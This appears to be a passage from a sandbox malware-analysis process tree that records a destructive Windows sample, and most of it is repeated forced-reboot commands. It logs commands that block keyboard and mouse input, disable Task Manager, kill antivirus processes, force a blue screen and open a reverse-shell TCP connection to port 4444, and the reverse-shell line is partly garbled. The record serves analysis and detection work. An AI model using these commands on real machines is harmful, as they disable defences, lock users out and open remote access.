        PID:1724
        
        C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        11⤵
        
        PID:1800
        
        C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        11⤵
        
        PID:1100
        
        C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        11⤵
        
        PID:2444
        
        C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        11⤵
        
        PID:1976
        
        C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        11⤵
        
        PID:1644
        
        C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        11⤵
        
        PID:2248
        
        C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        11⤵
        
        PID:2688
        
        C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        11⤵
        
        PID:2352
        
        C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        11⤵
        
        PID:280
        
        C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        11⤵
        
        PID:2816
        
        C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        11⤵
        
        PID:2116
        
        C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        11⤵
        
        PID:2236
        
        C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        11⤵
        
        PID:2756
        
        C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        11⤵
        
        PID:2072
        
        C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        11⤵
        
        PID:1512
        
        C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        11⤵
        
        PID:580
        
        C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        11⤵
        
        PID:1488
        
        C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        11⤵
        
        PID:2024
        
        C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        11⤵
        
        PID:2956
        
        C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        11⤵
        
        PID:1648
        
        C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        11⤵
        
        PID:2868
        
        C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        11⤵
        
        PID:2392
        
        C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        11⤵
        
        PID:2400
        
        C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        11⤵
        
        PID:3012
        
        C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        11⤵
        
        PID:2716
        
        C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        11⤵
        
        PID:300
        
        C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        11⤵
        
        PID:1100
        
        C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        11⤵
        
        PID:2788
        
        C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        11⤵
        
        PID:2516
        
        C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        11⤵
        
        PID:2972
        
        C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        11⤵
        
        PID:1644
        
        C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        11⤵
        
        PID:2448
        
        C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        11⤵
        
        PID:2992
        
        C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        11⤵
        
        PID:2352
        
        C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        11⤵
        
        PID:2600
        
        C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        11⤵
        
        PID:184
        
        C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        11⤵
        
        PID:2012
        
        C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        11⤵
        
        PID:2236
        
        C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        11⤵
        
        PID:1440
        
        C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        11⤵
        
        PID:2576
        
        C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        11⤵
        
        PID:3044
        
        C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        11⤵
        
        PID:2072
        
        C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        11⤵
        
        PID:2760
        
        C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        11⤵
        
        PID:2280
        
        C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        11⤵
        
        PID:2956
        
        C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        11⤵
        
        PID:2128
        
        C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        11⤵
        
        PID:1648
        
        C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        11⤵
        
        PID:3004
        
        C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        11⤵
        
        PID:2392
        
        C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        11⤵
        
        PID:984
        
        C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        11⤵
        
        PID:604
        
        C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        11⤵
        
        PID:2876
        
        C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        11⤵
        
        PID:300
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System; using System.Runtime.InteropServices; public class FullScreen { [DllImport(\"user32.dll\")] public static extern int MessageBoxTimeout(IntPtr hWnd, String text, String caption, uint type, int wLanguageId, int milliseconds); }; [FullScreen]::MessageBoxTimeout([IntPtr]::Zero, \"Your system is being destroyed. This is irreversible. You cannot escape.\", \"WARNING\", 0x00000010, 0, 86400000)'"
        9⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:2024
        
        C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\fa6kjsxg.cmdline"
        10⤵
        
        PID:2272
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System.Runtime.InteropServices; public class InputBlock { [DllImport(\"user32.dll\")] public static extern int BlockInput(bool block); }'; [InputBlock]::BlockInput($true)"
        9⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1092
        
        C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\61pbxn1m.cmdline"
        10⤵
        
        PID:2872
        
        C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESBBF0.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCBBEF.tmp"
        11⤵
        
        PID:2736
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 1 /f
        9⤵
        
        PID:1648
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System; using System.Runtime.InteropServices; public class DisableKeys { [DllImport(\"user32.dll\")] public static extern int BlockInput(bool block); }'; [DisableKeys]::BlockInput($true)"
        9⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2112
        
        C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\kd3egewr.cmdline"
        10⤵
        
        PID:2680
        
        C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESC034.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCC033.tmp"
        11⤵
        
        PID:1740
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "$obj = New-Object -ComObject WScript.Shell; $obj.SendKeys('{TAB}')"
        9⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2252
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden -Command "$form = New-Object Windows.Forms.Form; $form.WindowState = 'Maximized'; $form.TopMost = $true; $form.BackColor = 'Black'; $label = New-Object Windows.Forms.Label; $label.Text = 'WARNING: SYSTEM DESTRUCTION INITIATED!'; $label.ForeColor = 'Red'; $label.Font = 'Microsoft Sans Serif, 48pt'; $label.AutoSize = $true; $label.TextAlign = 'MiddleCenter'; $form.Controls.Add($label); $form.ShowDialog()"
        9⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2880
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "$client = New-Object System.Net.Sockets.TCPClient('192.168.1.100', 4444); $stream = $client.GetStream(); [byte[]]$bytes = 0..65535|:ASCII).GetBytes($sendback2); $stream.Write($sendbyte,0,$sendbyte.Length); $stream.Flush()}; $client.Close()"
        9⤵
        
        PID:2884
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM MsMpEng.exe /F
        9⤵
        Kills process with taskkill
        
        PID:1584
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM AvastSvc.exe /F
        9⤵
        
        PID:3056
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM avgsvc.exe /F
        9⤵
        Kills process with taskkill
        
        PID:1660
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM McAfee.exe /F
        9⤵
        
        PID:2908
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM Norton.exe /F
        9⤵
        
        PID:1904
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM Kaspersky.exe /F
        9⤵
        
        PID:2716
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM BitDefender.exe /F
        9⤵
        
        PID:2380
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM Sophos.exe /F
        9⤵
        
        PID:2600
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM malwarebytes.exe /F
        9⤵
        Kills process with taskkill
        
        PID:2560
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM CylanceSvc.exe /F
        9⤵
        
        PID:2416
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM Panda.exe /F
        9⤵
        
        PID:2816
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM EsetService.exe /F
        9⤵
        
        PID:1696
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System; using System.Runtime.InteropServices; public class BlockInput { [DllImport(\"user32.dll\")] public static extern bool BlockInput(bool fBlockIt); }'; [BlockInput]::BlockInput($true)"
        9⤵
        
        PID:604
        
        C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\u5qior-u.cmdline"
        10⤵
        
        PID:1160
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System.Runtime.InteropServices; public class BSoD { [DllImport(\"ntdll.dll\", SetLastError=true)] public static extern uint NtRaiseHardError(uint ErrorStatus, uint NumberOfParameters, uint UnicodeStringParameterMask, IntPtr Parameters, uint ResponseOption, out uint Response); }'; [BSoD]::NtRaiseHardError(0xc0000005, 0, 0, [IntPtr]::Zero, 6, [ref]0)"
        9⤵
        
        PID:1092
        
        C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\q5mw9jow.cmdline"
        10⤵
        
        PID:2800
        
        C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        9⤵
        
        PID:2976
        
        C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        9⤵
        
        PID:1048
        
        C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        9⤵
        
        PID:2136
        
        C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        9⤵
        
        PID:2152
        
        C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        9⤵
        
        PID:1692
        
        C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        9⤵
        
        PID:280
        
        C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        9⤵
        
        PID:2780
        
        C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        9⤵
        
        PID:2368
        
        C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        9⤵
        
        PID:3068
        
        C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        9⤵
        
        PID:580
        
        C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        9⤵
        
        PID:848
        
        C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        9⤵
        
        PID:2784
        
        C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        9⤵
        
        PID:1648
        
        C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        9⤵
        
        PID:2836
        
        C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        9⤵
        
        PID:288
        
        C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        9⤵
        
        PID:340
        
        C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        9⤵
        
        PID:2892
        
        C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        9⤵
        
        PID:1648
        
        C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        9⤵
        
        PID:752
        
        C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        9⤵
        
        PID:2496
        
        C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        9⤵
        
        PID:1220
        
        C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        9⤵
        
        PID:1608
        
        C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        9⤵
        
        PID:1588
        
        C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        9⤵
        
        PID:752
        
        C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        9⤵
        
        PID:2188
        
        C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        9⤵
        
        PID:2968
        
        C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        9⤵
        
        PID:2380
        
        C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        9⤵
        
        PID:2208
        
        C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        9⤵
        
        PID:2760
        
        C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        9⤵
        
        PID:752
        
        C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        9⤵
        
        PID:2296
        
        C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        9⤵
        
        PID:1628
        
        C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        9⤵
        
        PID:2416
        
        C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        9⤵
        
        PID:2188
        
        C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        9⤵
        
        PID:1740
        
        C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        9⤵
        
        PID:1380
        
        C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        9⤵
        
        PID:1828
        
        C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        9⤵
        
        PID:296
        
        C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        9⤵
        
        PID:1644
        
        C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        9⤵
        
        PID:2500
        
        C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        9⤵
        
        PID:2896
        
        C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        9⤵
        
        PID:184
        
        C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        9⤵
        
        PID:1792
        
        C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        9⤵
        
        PID:2072
        
        C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        9⤵
        
        PID:1588
        
        C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        9⤵
        
        PID:1512
        
        C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        9⤵
        
        PID:1488
        
        C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        9⤵
        
        PID:752
        
        C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        9⤵
        
        PID:2820
        
        C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        9⤵
        
        PID:2524
        
        C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        9⤵
        
        PID:2332
        
        C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        9⤵
        
        PID:2800
        
        C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        9⤵
        
        PID:2152
        
        C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        9⤵
        
        PID:2344
        
        C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        9⤵
        
        PID:1220
        
        C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        9⤵
        
        PID:2784
        
        C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        9⤵
        
        PID:296
        
        C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        9⤵
        
        PID:2912
        
        C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        9⤵
        
        PID:2768
        
        C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        9⤵
        
        PID:2992
        
        C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        9⤵
        
        PID:2600
        
        C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        9⤵
        
        PID:2896
        
        C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        9⤵
        
        PID:2012
        
        C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        9⤵
        
        PID:1596
        
        C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        9⤵
        
        PID:2232
        
        C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        9⤵
        
        PID:1792
        
        C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        9⤵
        
        PID:2108
        
        C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        9⤵
        
        PID:784
        
        C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        9⤵
        
        PID:2636
        
        C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        9⤵
        
        PID:2256
        
        C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        9⤵
        
        PID:1956
        
        C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        9⤵
        
        PID:3052
        
        C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        9⤵
        
        PID:984
        
        C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        9⤵
        
        PID:904
        
        C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        9⤵
        
        PID:896
        
        C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        9⤵
        
        PID:2800
        
        C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        9⤵
        
        PID:2344
        
        C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        9⤵
        
        PID:2964
        
        C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        9⤵
        
        PID:2784
        
        C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        9⤵
        
        PID:2780
        
        C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        9⤵
        
        PID:1976
        
        C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        9⤵
        
        PID:1136
        
        C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        9⤵
        
        PID:2248
        
        C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        9⤵
        
        PID:2532
        
        C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        9⤵
        
        PID:280
        
        C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        9⤵
        
        PID:2112
        
        C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        9⤵
        
        PID:2232
        
        C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        9⤵
        
        PID:1720
        
        C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        9⤵
        
        PID:1792
        
        C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        9⤵
        
        PID:2460
        
        C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        9⤵
        
        PID:784
        
        C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        9⤵
        
        PID:2588
        
        C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        9⤵
        
        PID:2080
        
        C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        9⤵
        
        PID:2832
        
        C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        9⤵
        
        PID:3052
        
        C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        9⤵
        
        PID:1368
        
        C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        9⤵
        
        PID:1724
        
        C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        9⤵
        
        PID:2408
        
        C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        9⤵
        
        PID:1144
        
        C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        9⤵
        
        PID:2060
        
        C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        9⤵
        
        PID:2344
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System; using System.Runtime.InteropServices; public class FullScreen { [DllImport(\"user32.dll\")] public static extern int MessageBoxTimeout(IntPtr hWnd, String text, String caption, uint type, int wLanguageId, int milliseconds); }; [FullScreen]::MessageBoxTimeout([IntPtr]::Zero, \"Your system is being destroyed. This is irreversible. You cannot escape.\", \"WARNING\", 0x00000010, 0, 86400000)'"
        7⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:2680
        
        C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\m3jyck5x.cmdline"
        8⤵
        
        PID:300
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System.Runtime.InteropServices; public class InputBlock { [DllImport(\"user32.dll\")] public static extern int BlockInput(bool block); }'; [InputBlock]::BlockInput($true)"
        7⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2208
        
        C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\bpuznotu.cmdline"
        8⤵
        
        PID:2660
        
        C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESBC6D.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCBC6C.tmp"
        9⤵
        
        PID:2632
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 1 /f
        7⤵
        
        PID:1756
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System; using System.Runtime.InteropServices; public class DisableKeys { [DllImport(\"user32.dll\")] public static extern int BlockInput(bool block); }'; [DisableKeys]::BlockInput($true)"
        7⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:628
        
        C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\pma2cdvv.cmdline"
        8⤵
        
        PID:1860
        
        C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESC0A2.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCC0A1.tmp"
        9⤵
        
        PID:3048
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "$obj = New-Object -ComObject WScript.Shell; $obj.SendKeys('{TAB}')"
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2156
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden -Command "$form = New-Object Windows.Forms.Form; $form.WindowState = 'Maximized'; $form.TopMost = $true; $form.BackColor = 'Black'; $label = New-Object Windows.Forms.Label; $label.Text = 'WARNING: SYSTEM DESTRUCTION INITIATED!'; $label.ForeColor = 'Red'; $label.Font = 'Microsoft Sans Serif, 48pt'; $label.AutoSize = $true; $label.TextAlign = 'MiddleCenter'; $form.Controls.Add($label); $form.ShowDialog()"
        7⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1428
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "$client = New-Object System.Net.Sockets.TCPClient('192.168.1.100', 4444); $stream = $client.GetStream(); [byte[]]$bytes = 0..65535|:ASCII).GetBytes($sendback2); $stream.Write($sendbyte,0,$sendbyte.Length); $stream.Flush()}; $client.Close()"
        7⤵
        
        PID:1068
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM MsMpEng.exe /F
        7⤵
        
        PID:2344
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM AvastSvc.exe /F
        7⤵
        
        PID:1544
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM avgsvc.exe /F
        7⤵
        
        PID:3056
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM McAfee.exe /F
        7⤵
        
        PID:2064
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM Norton.exe /F
        7⤵
        
        PID:1976
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM Kaspersky.exe /F
        7⤵
        
        PID:2128
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM BitDefender.exe /F
        7⤵
        
        PID:1500
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM Sophos.exe /F
        7⤵
        
        PID:1992
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM malwarebytes.exe /F
        7⤵
        Kills process with taskkill
        
        PID:2416
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM CylanceSvc.exe /F
        7⤵
        Kills process with taskkill
        
        PID:1716
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM Panda.exe /F
        7⤵
        
        PID:2144
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM EsetService.exe /F
        7⤵
        
        PID:2532
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System; using System.Runtime.InteropServices; public class BlockInput { [DllImport(\"user32.dll\")] public static extern bool BlockInput(bool fBlockIt); }'; [BlockInput]::BlockInput($true)"
        7⤵
        
        PID:556
        
        C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\w5fmb5y7.cmdline"
        8⤵
        
        PID:1220
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
